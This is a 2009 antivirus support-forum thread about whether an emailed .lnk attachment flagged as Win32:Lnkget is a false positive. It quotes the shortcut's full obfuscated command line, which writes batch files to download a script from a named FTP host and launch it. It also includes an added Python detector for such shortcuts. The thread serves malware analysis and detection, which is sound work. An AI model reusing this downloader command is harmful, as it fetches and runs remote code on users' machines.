Author Topic: Win32:Lnkget or FP?  (Read 10734 times)


Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Win32:Lnkget or FP?
« on: September 07, 2009, 10:06:34 AM »
I received an email which was reported by Avast Home as infected by Win32:Lnkget. I uploaded this email to VirusTotal (http://www.virustotal.com/) for scanning and analysis. The result can be found here: http://www.virustotal.com/analisis/de3b90893777ef57a4f5710465e54af0524b5c0c6938d97a16885bf7edb5b542-1252306731

There are 9 out of 41 antivirus software products reporting this email as containing a malware link. The other 32 consider this email clean. How can I tell whether it is a false positive?

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #1 on: September 07, 2009, 11:12:39 AM »
Hi,
you can send this file to us using the avast! warning dialog, as shown in the picture below, and we will analyze it. If it is a false positive we will fix it.

Milos

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #2 on: September 07, 2009, 12:58:45 PM »
Hi,
it looks that your email contains some attachment with a shortcut (file with .lnk extension), that looks like the picture below (right click -> Properties). See the part called "Target". If it looks similar it's not a false positive.

Milos

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #3 on: September 07, 2009, 01:42:08 PM »
Quote
Hi,
it looks that your email contains some attachment with a shortcut (file with .lnk extension), that looks like the picture below (right click -> Properties). See the part called "Target". If it looks similar it's not a false positive.

Milos
Hi, Milos,

There are two identical lnk shortcuts (but with different lnk names) attached in the suspected email. For your reference, I hereby copied their "Target" settings:

lnk1: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&

lnk2: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&

Are these scripts supposed to download stuff and even execute some of it on my system? But my question is how to tell if these scripts will do real damage to my system, such as deleting system files, altering the Windows registry, or opening a back door as a Trojan. Could my XP system be that vulnerable as to be totally controlled by such scripts? Above all, why did the other 32 antivirus software products from VirusTotal check it and let it pass?

Dan

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #4 on: September 07, 2009, 03:24:53 PM »
Hi dude2,
the script in the "Target" creates a script for ftp (address ftp.g03z.com) with a filled-in username and password and tries to download the file "p" and store it as "p.vbs" in %windir% (from the shortcut properties "Start in") and then run "p.vbs". But the file "p" doesn't exist at this time on the ftp server, so "p.vbs" is empty and does nothing (no real damage to your system).

Why did the other antivirus software products from VirusTotal check it and let it pass? I don't know, maybe they didn't analyze this file.


Milos

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #5 on: September 07, 2009, 05:41:47 PM »
Milos, thank you for your thorough investigation on this issue.

But, here comes the hazy part of this odd problem. If a friend sends me an email with a lnk which can lead me to his well-arranged script procedure, and if I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because of some automated scripts getting executed?

Or, does there need to be any harmful signatures or patterns of the activities of the executed scripts which match the Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts are manipulating the system or putting users in harm's way.

If you said that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of the embedded scripts in the lnk reference. If that is the case, to me it is more like an "access control related issue" and users need to wisely set up their system so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products cannot conclude this email is infected simply from finding embedded scripts, but instead need more evidence of suspected activities?

Thank you,

Dan
« Last Edit: September 07, 2009, 05:43:53 PM by dude2 »

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #6 on: September 07, 2009, 06:06:57 PM »
Quote
But, here comes the hazy part of this odd problem. If a friend sends me an email with a lnk which can lead me to his well-arranged script procedure, and if I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because of some automated scripts getting executed?
Yes, avast! will still detect that email -- when avast! scans that .lnk file it doesn't know if the file on the ftp server exists. If you don't disable avast! it doesn't allow you to run this script.

Quote
Or, does there need to be any harmful signatures or patterns of the activities of the executed scripts which match Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts are manipulating the system or put users in the harm way.
Yes.

Quote
If you said that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of embedded scripts in lnk reference. If it is the case, to me it is more like a "access control related issue" and users need to wisely set their system so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products can not conclude this email infected simply from finding embedded scripts, but instead needing more evidence on suspected activities?
I think that it would be hard work to analyze some script in an AV engine, log in to some ftp server using data gathered from the analyzed script, check if the file exists, download it and again check if it's harmful (you can see here the possibility of long processing times).

If you receive some suspected email or program which you don't trust you can run it in some virtual machine and see if it is doing some bad things -- you can then return to the previous state before infection.

Milos

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #7 on: September 08, 2009, 06:47:50 AM »
Yes, the lnks' targets contain scripts, but I did not see the suspected scripts manipulating the system or putting users in harm's way, simply because the file "p" doesn't even exist on the remote FTP server during the test. If some of those VirusTotal-listed 32 antivirus software products that DID NOT SHOW POSITIVE come with file emulation or some heuristic analysis capability and they do not find those scripts doing any harm other than trying to connect to a remote site and to download and execute unharmful stuff, then are we safe to say it is a false positive or maybe a little overcautious? Or, do you think the test results from those 32 out of 41 AV products are false negatives?

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #8 on: September 08, 2009, 10:22:02 AM »
If you look at the script, you can see that there is no direct ftp address (it is substituted during runtime) and some commands are substituted the same way, so what is the reason to do that? It is considered a malware practice to hide the real behavior, so the other AVs are false negatives.
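The reasoning in the last two replies (the shortcut builds an ftp script, and hides the ftp address and commands behind variables that only take their value at run time) can be turned into a static check. The following is an added example for this thread, not avast's code and not the logic behind the Win32:Lnkget signature: it expands the `set NAME=VALUE` assignments that the "Target" line itself creates, roughly as cmd.exe would when the generated batch file runs, and then counts traits that only make sense together in a downloader. The two benign targets and the host name ftp.example.com are constructed for comparison; the expansion is a deliberately simplified model of cmd.exe (no delayed expansion, no nested variables).

```python
"""Static triage of a Windows shortcut (.lnk) "Target" command line.

Added example for this thread; it is not avast's code and not the detection
logic behind the Win32:Lnkget signature.  It applies the reasoning given in
the thread: a legitimate shortcut has no reason to assemble "ftp", "-s:" or
the server name from variables at run time, so we (1) statically expand the
`set NAME=VALUE` assignments the command line itself creates, roughly as
cmd.exe does when the generated batch file runs, and (2) count traits that
only make sense together in a downloader.  The expansion is a deliberately
simplified model of cmd.exe (no delayed expansion, no nested variables).
"""
import re

# Target of the shortcut posted in the thread (lnk1 and lnk2 are identical).
LNK_TARGET = (
    r"%ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat"
    r"&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m"
    r"&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m"
    r"&echo start p.vbs>>m&ren m t.bat&t.bat&"
)

# Constructed benign targets for comparison (not from the thread; the host
# ftp.example.com is a placeholder).
BENIGN_DIR = r"%ComSpec% /c dir /s > listing.txt"
BENIGN_FTP = r"ftp -s:upload.txt ftp.example.com"

SET_RE = re.compile(r"\bset\s+(\w+)=([^&>]*)", re.IGNORECASE)


def expand_set_vars(cmd: str) -> str:
    """Replace %NAME% with the value an embedded `set NAME=VALUE` assigns.

    Real environment variables such as %ComSpec% are left untouched, so the
    output shows exactly what the script hid behind its own variables.
    """
    assigned = {name.lower(): value for name, value in SET_RE.findall(cmd)}

    def repl(m):
        return assigned.get(m.group(1).lower(), m.group(0))

    return re.sub(r"%(\w+)%", repl, cmd)


def ftp_hosts(cmd: str) -> list:
    """Host names of the form ftp.<domain> visible after expansion."""
    return re.findall(r"\bftp\.[\w-]+(?:\.[\w-]+)+", expand_set_vars(cmd).lower())


def indicators(target: str) -> list:
    """Names of the downloader traits found in a shortcut target."""
    found = []
    low = target.lower()
    exp_low = expand_set_vars(target).lower()

    # 1. cmd.exe launched with a long chain of commands glued together by '&'.
    if ("%comspec%" in low or re.search(r"\bcmd(\.exe)?\b", low)) \
            and "/c" in low and low.count("&") >= 3:
        found.append("cmd_command_chain")
    # 2. ftp tokens that exist only after the script's own variables expand.
    if any(tok in exp_low and tok not in low for tok in ("ftp -s:", "ftp.")):
        found.append("tokens_hidden_by_variable_substitution")
    # 3. A non-interactive ftp session driven from a script file.
    if "ftp -s:" in exp_low:
        found.append("scripted_ftp_session")
    # 4. A batch file is written (or renamed into place) and then executed.
    for name in set(re.findall(r"\w+\.bat", exp_low)):
        written = re.search(r"(?:>|ren\s+\w+\s+)" + re.escape(name), exp_low)
        run = re.search(r"(?:call\s+|&)" + re.escape(name) + r"\b", exp_low)
        if written and run:
            found.append("writes_then_runs_batch")
            break
    # 5. A script interpreter file is launched at the end of the chain.
    if re.search(r"\bstart\s+\S+\.(?:vbs|js|wsf)\b", exp_low):
        found.append("launches_script_file")
    return found


def is_suspicious(target: str, threshold: int = 3) -> bool:
    """Flag a target only when several traits occur together."""
    return len(indicators(target)) >= threshold


if __name__ == "__main__":
    for label, t in (("lnk", LNK_TARGET), ("dir", BENIGN_DIR), ("ftp", BENIGN_FTP)):
        print(label, is_suspicious(t), indicators(t), ftp_hosts(t))
    print(expand_set_vars(LNK_TARGET))
```

Running it shows the expanded line with "ftp.g03z.com", "get p p.vbs" and "ftp -s:l" in the clear, and all five traits on the thread's shortcut. A plain `ftp -s:` command with the server passed as an argument, which Windows supports and a legitimate script may well use, scores a single trait and is not flagged: the verdict rests on the combination of hiding and chaining, not on the use of ftp by itself.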

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #9 on: September 08, 2009, 06:15:29 PM »
Are those scripts at most to be considered mischievous? Or, do they really manipulate the system to the extent of degrading system performance or security or put users in harm's way? Once that is clarified, I may concur more with the false positive or false negative conclusion.

Quote
If you look at the script, you can see that there is no direct ftp address (it is substituted during runtime) and some commands are substituted the same way, so what is the reason to do that? It is considered a malware practice to hide the real behavior, so the other AVs are false negatives.
I do not know the reason for using a substituted ftp address during the runtime. But could a legitimate script or program use a similar technique? Doesn't the Windows system itself take an ftp address as an argument in its command line or FTP app environment? Again it is only my immature opinion, but can we judge a script simply by its programming techniques?

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #10 on: September 09, 2009, 09:17:54 AM »
Quote
Are those scripts at most being considered as mischievous?
a) If you mean the script which is downloaded from ftp -- I don't remember. But the script is downloaded from a strange url, g03z.com (you can see the owner and other properties: http://whois.domaintools.com/g03z.com or the picture below).

b) If you mean the script from the .lnk -- yes.

In the case of this .lnk file, there is no reason to obfuscate the script, so it can be considered malicious, plus the WHOIS information.

A legitimate script has no reason to obfuscate the ftp address.

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #11 on: September 10, 2009, 01:24:26 AM »
There is no arguing that the site administrator's identity does look suspicious based on the registration info on whois, and it is just as suspicious to have scripts embedded in a lnk, especially doing ftp and downloading stuff. But what trait makes it more than just suspicious or somewhat obfuscating, but honored enough to join the Avast! iAVS/VPS, still baffles me. I think a so-called malware needs to manipulate the system to the extent of degrading system performance or security or to put users in harm's way.

Based on http://www.avast.com/eng/vps-content-2009.html, Avast! honored Win32:Lnkget as a Trojan in its VPS. But, based on http://www.viruslist.com/en/virusesdescribed and http://www.viruslist.com/en/virusesdescribed?chapter=152540521, a Trojan, especially a Trojan Downloader, needs to download and install new malware or adware on the victim machine. Meanwhile, a Trojan Dropper is composed of at least a dangerous payload and a harmless hoax, such as jokes, games, graphics and so forth. What if the downloaded stuff cannot be detected as malware, adware, or a dangerous payload?
« Last Edit: September 10, 2009, 02:06:09 AM by dude2 »

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #12 on: September 10, 2009, 10:06:11 AM »
It depends, case by case.

Offline dude2

  • Jr. Member
  • **
  • Posts: 68
Re: Win32:Lnkget or FP?
« Reply #13 on: September 10, 2009, 11:15:29 AM »
Quote
It depends, case by case.
Can you elaborate on that? Be more specific on my case, please.
« Last Edit: September 10, 2009, 11:18:05 AM by dude2 »

Offline Milos

  • Avast team
  • Super Poster
  • *
  • Posts: 2238
Re: Win32:Lnkget or FP?
« Reply #14 on: September 10, 2009, 01:49:36 PM »
Quote
It depends, case by case.
Can you elaborate on that? Be more specific on my case, please.
The file on ftp server doesn't exist, so I can't be more specific.